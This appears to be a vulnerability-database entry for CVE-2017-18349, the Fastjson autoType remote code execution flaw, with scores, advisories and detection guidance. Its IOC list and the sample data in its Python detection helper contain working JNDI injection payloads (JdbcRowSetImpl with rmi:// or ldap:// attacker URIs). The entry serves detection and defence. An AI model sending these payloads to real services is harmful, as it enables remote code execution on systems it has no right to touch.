CVE-2017-18349
Published: 2018-10-23
Priority: P1 86 · critical · CVSS 3.0 score 9.8
CVSS 3.0 vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Badges: ITW · EXPLOIT · VulnCheck KEV
Exploited in the wild
EPSS: 38.97% (98.4th percentile)
parseObject in Fastjson before 1.2.25, as used in FastjsonEngine in Pippo 1.11.0 and other products, allows remote attackers to execute arbitrary code via a crafted JSON request, as demonstrated by a crafted rmi:// URI in the dataSourceName field of HTTP POST data to the Pippo /json URI, which is mishandled in AjaxApplication.java.
Affected (3 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| alibaba | fastjson | < 1.2.48 | 1.2.48 |
| alibaba | fastjson | < 1.2.25 | 1.2.25 |
| pippo | pippo | — | — |
Detection & IOCs (extracted from sources)

- url: /api/json
- url: /parse
- url: /deserialize
- command: {"@type": "com.sun.rowset.JdbcRowSetImpl", "dataSourceName": "rmi://<attacker>/", "autoCommit": true}
- command: {"@type": "com.sun.rowset.JdbcRowSetImpl", "dataSourceName": "ldap://<attacker>/", "autoCommit": true}
- other: com.sun.rowset.JdbcRowSetImpl

Sigma condition:
condition: contains(interactsh_protocol,'dns') AND contains(content_type,'application/json') AND contains_all(body,'autoCommit','set property error')

Detection guidance:
- Look for HTTP POST requests to /json, /api/json, /parse, or /deserialize endpoints with Content-Type: application/json containing the @type key set to com.sun.rowset.JdbcRowSetImpl and a dataSourceName field containing an rmi:// or ldap:// URI pointing to an attacker-controlled host.
- Detect the error response string 'set property error' alongside 'autoCommit' in the response body, which indicates the vulnerable Fastjson code path was triggered.
- Monitor for outbound DNS or LDAP/RMI connections originating from the Java process after receiving a JSON payload containing @type with com.sun.rowset.JdbcRowSetImpl; this indicates successful JNDI injection triggering an out-of-band callback.
- Flag any JSON body containing the literal string @type with value com.sun.rowset.JdbcRowSetImpl regardless of nesting depth (top-level, inside a 'data' key, or inside a 'b' key), as the exploit template demonstrates multiple wrapping variants.
- This vulnerability exists because Fastjson's autoType feature mishandles @type keys; detection should also cover LDAP-based JNDI injection payloads in the dataSourceName field, as the same class is exploitable via ldap:// URIs.

Notes:
- The Nuclei template uses interactsh (OOB/OAST) for DNS callback detection; this detection method requires an active interactsh server and will not fire in air-gapped or DNS-filtered environments.
- The exploit is demonstrated against Pippo's /json endpoint, but the vulnerable parseObject function is in Fastjson itself; any application using Fastjson before 1.2.25 with autoType enabled is affected regardless of framework or endpoint path.
- The fix in 1.2.25 was incomplete; Fastjson before 1.2.48 remains vulnerable to autoType mishandling leading to JNDI injection, and a further bypass is tracked as CVE-2022-25845.
- The stop-at-first-match flag in the Nuclei template means only the first matching endpoint is tested per request sequence; in production scanning, all candidate paths (/json, /api/json, /parse, /deserialize) should be tested independently.
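The guidance above reduces to a request-side check (JSON body, gadget class in an @type key at any depth, rmi:// or ldap:// in dataSourceName, known entry-point path) and a response-side check (the 'set property error' / 'autoCommit' pair from the sigma condition). The following is an added example of that detection logic written for this page, not a rule from any of the sources listed; it assumes the caller hands it the request path, Content-Type header and raw body as strings, and all sample traffic in it is constructed (the `attacker.invalid` host is a placeholder). It goes slightly beyond the text in one respect: because Fastjson accepts documents that a strict JSON parser rejects, it falls back to a literal-string search when `json.loads` fails, so a body with a trailing comma or duplicate keys is still inspected.

```python
"""Detection helper for the Fastjson JdbcRowSetImpl JNDI gadget (CVE-2017-18349).

Assumed inputs: a request's path, Content-Type header and raw body (str),
and optionally the response body. Every sample message below is constructed.
"""
import json
import re
from typing import Any, Iterator

GADGET_CLASS = "com.sun.rowset.JdbcRowSetImpl"
WATCHED_PATHS = ("/json", "/api/json", "/parse", "/deserialize")
JNDI_SCHEMES = ("rmi://", "ldap://")
# Raw-string fallback for bodies that Python's json module rejects but a more
# permissive parser such as Fastjson would still accept.
RAW_TYPE_RE = re.compile(r'"@type"\s*:\s*"' + re.escape(GADGET_CLASS) + '"')
RAW_DSN_RE = re.compile(r'"dataSourceName"\s*:\s*"(rmi|ldap)://[^"]*"', re.IGNORECASE)


def _walk(node: Any, path: str = "$") -> Iterator[tuple[str, dict]]:
    """Yield every JSON object in the document with a JSONPath-like location,
    so the gadget is found whether it is top-level or wrapped in 'data', 'b',
    an array element, or anything else."""
    if isinstance(node, dict):
        yield path, node
        for key, value in node.items():
            yield from _walk(value, f"{path}.{key}")
    elif isinstance(node, list):
        for i, value in enumerate(node):
            yield from _walk(value, f"{path}[{i}]")


def inspect_request(path: str, content_type: str, body: str) -> list[str]:
    """Return human-readable findings for one request; an empty list means clean."""
    findings: list[str] = []
    if "application/json" not in (content_type or "").lower():
        return findings  # both the sigma rule and the gadget require a JSON body
    on_watched_path = path.split("?", 1)[0] in WATCHED_PATHS
    try:
        doc = json.loads(body)
    except ValueError:
        # Not strict JSON: inspect the literals instead of giving up.
        if RAW_TYPE_RE.search(body):
            findings.append(f"unparseable body names gadget class {GADGET_CLASS}")
        match = RAW_DSN_RE.search(body)
        if match:
            findings.append(f"unparseable body carries {match.group(1).lower()}:// dataSourceName")
        return findings
    for loc, obj in _walk(doc):
        if obj.get("@type") != GADGET_CLASS:
            continue
        findings.append(f"@type={GADGET_CLASS} at {loc}")
        dsn = obj.get("dataSourceName")
        if isinstance(dsn, str) and dsn.lower().startswith(JNDI_SCHEMES):
            scheme = dsn.split("://", 1)[0].lower()
            findings.append(f"JNDI {scheme}:// dataSourceName at {loc}")
        if obj.get("autoCommit") is True:
            findings.append(f"autoCommit=true at {loc} (present in the known payloads)")
    if findings and on_watched_path:
        findings.append(f"request path {path} is a known Fastjson entry point")
    return findings


def response_indicates_trigger(response_body: str) -> bool:
    """Response-side check from the sigma condition: both strings must appear."""
    return "set property error" in response_body and "autoCommit" in response_body


# Constructed sample traffic: one payload nested under a 'data' key, one benign request.
SAMPLE_NESTED = (
    '{"data": {"@type": "com.sun.rowset.JdbcRowSetImpl", '
    '"dataSourceName": "ldap://attacker.invalid/x", "autoCommit": true}}'
)
SAMPLE_BENIGN = '{"name": "alice", "dataSourceName": "jdbc:h2:mem:test"}'
SAMPLE_RESPONSE = '{"error": "set property error, autoCommit"}'

if __name__ == "__main__":
    for body in (SAMPLE_NESTED, SAMPLE_BENIGN):
        print("/api/json", inspect_request("/api/json", "application/json; charset=utf-8", body) or "clean")
    print("response trigger:", response_indicates_trigger(SAMPLE_RESPONSE))
```

The request-side function can be run over a proxy or WAF log export one request at a time; the response-side function is cheap enough to apply to every JSON response from the watched paths. Neither replaces the outbound-connection monitoring the guidance also calls for, which is the only signal that confirms the JNDI lookup actually happened.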
CVSS provenance

| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.0 | 9.8 | CRITICAL | CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| nvd | v2.0 | 10.0 | CRITICAL | AV:N/AC:L/Au:N/C:C/I:C/A:C |
| ghsa | — | 9.8 | CRITICAL | — |
| osv | — | 9.8 | CRITICAL | — |
| vulncheck | — | 9.8 | CRITICAL | — |
| vendor_redhat | — | 9.8 | CRITICAL | — |
Red Hat: fastjson: Fastjson: Remote Code Execution via JNDI Injection due to autoType mishandling
vendor_redhat · 2026-01-09 · CVSS 9.8 · CVE-2025-70974 [CRITICAL] CWE-829
Fastjson before 1.2.48 mishandles autoType because, when an @type key is in a JSON document, and the value of that key is the name of a Java class, there may be calls to certain public methods of that class. Depending on the behavior of those methods, there may be JNDI injection with an attacker-supplied payload located elsewhere in that JSON document. This was exploited in the wild in 2023 through 2025. NOTE: this issue exists because of an incomplete fix for CVE-2017-18349. Also, a later bypass is covered by CVE-2022-25845.
A flaw was found in Fastjson, a popular Java library for converting Java objects to JSON and vice versa. This vulnerability allows a remote attacker to execute arbitrary code on
OSV: FASTJSON Includes Functionality from Untrusted Control Sphere
osv · 2026-01-09 · CVSS 9.8 · CVE-2025-70974 [CRITICAL]
Fastjson before 1.2.48 mishandles autoType because, when an `@type` key is in a JSON document, and the value of that key is the name of a Java class, there may be calls to certain public methods of that class. Depending on the behavior of those methods, there may be JNDI injection with an attacker-supplied payload located elsewhere in that JSON document. This was exploited in the wild in 2023 through 2025. NOTE: this issue exists because of an incomplete fix for CVE-2017-18349. Also, a later bypass is covered by CVE-2022-25845.
GHSA: FASTJSON Includes Functionality from Untrusted Control Sphere
ghsa · 2026-01-09 · CVSS 9.8 · CVE-2025-70974 [CRITICAL] CWE-829
Fastjson before 1.2.48 mishandles autoType because, when an `@type` key is in a JSON document, and the value of that key is the name of a Java class, there may be calls to certain public methods of that class. Depending on the behavior of those methods, there may be JNDI injection with an attacker-supplied payload located elsewhere in that JSON document. This was exploited in the wild in 2023 through 2025. NOTE: this issue exists because of an incomplete fix for CVE-2017-18349. Also, a later bypass is covered by CVE-2022-25845.
VulnCheck: alibaba fastjson Inclusion of Functionality from Untrusted Control Sphere
vulncheck · 2025 · CVSS 9.8 · CVE-2025-70974 [CRITICAL]
Fastjson before 1.2.48 mishandles autoType because, when an @type key is in a JSON document, and the value of that key is the name of a Java class, there may be calls to certain public methods of that class. Depending on the behavior of those methods, there may be JNDI injection with an attacker-supplied payload located elsewhere in that JSON document. This was exploited in the wild in 2023 through 2025. NOTE: this issue exists because of an incomplete fix for CVE-2017-18349. Also, a later bypass is covered by CVE-2022-25845.
Affected: alibaba fastjson
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploit
GHSA: Improper Input Validation in alilibaba:fastjson
ghsa · 2018-10-24 · CVE-2017-18349 [CRITICAL] CWE-20
parseObject in Fastjson before 1.2.25, as used in FastjsonEngine in Pippo 1.11.0 and other products, allows remote attackers to execute arbitrary code via a crafted JSON request, as demonstrated by a crafted rmi:// URI in the dataSourceName field of HTTP POST data to the Pippo /json URI, which is mishandled in AjaxApplication.java.
OSV: Improper Input Validation in alilibaba:fastjson
osv · 2018-10-24 · CVE-2017-18349 [CRITICAL]
parseObject in Fastjson before 1.2.25, as used in FastjsonEngine in Pippo 1.11.0 and other products, allows remote attackers to execute arbitrary code via a crafted JSON request, as demonstrated by a crafted rmi:// URI in the dataSourceName field of HTTP POST data to the Pippo /json URI, which is mishandled in AjaxApplication.java.
VulnCheck: alibaba fastjson Improper Input Validation
vulncheck · 2017 · CVSS 9.8 · CVE-2017-18349 [CRITICAL]
parseObject in Fastjson before 1.2.25, as used in FastjsonEngine in Pippo 1.11.0 and other products, allows remote attackers to execute arbitrary code via a crafted JSON request, as demonstrated by a crafted rmi:// URI in the dataSourceName field of HTTP POST data to the Pippo /json URI, which is mishandled in AjaxApplication.java.
Affected: alibaba fastjson
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References:
- https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2024-01-22&host_type=src&vulnerability=cve-2017-18349
- https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=
No detection rules found.
Nuclei: Fastjson Insecure Deserialization - Remote Code Execution
nuclei · CVSS 9.8 · CVE-2017-18349 [CRITICAL]
parseObject in Fastjson before 1.2.25, as used in FastjsonEngine in Pippo 1.11.0 and other products, allows remote attackers to execute arbitrary code via a crafted JSON request, as demonstrated by a crafted rmi-// URI in the dataSourceName field of HTTP POST data to the Pippo /json URI, which is mishandled in AjaxApplication.java.
Template:
```yaml
id: CVE-2017-18349
info:
  name: Fastjson Insecure Deserialization - Remote Code Execution
  author: night
  severity: critical
  description: |
    parseObject in Fastjson before 1.2.25, as used in FastjsonEngine in Pippo 1.11.0 and other products, allows remote attackers to execute arbitrary code via a crafted JSON request, as demonstrated by a crafted rmi-// URI in the dataSourceName field of HTTP PO
```
References:
- https://fortiguard.com/encyclopedia/ips/44059
- https://github.com/alibaba/fastjson/wiki/security_update_20170315
- https://github.com/pippo-java/pippo/issues/466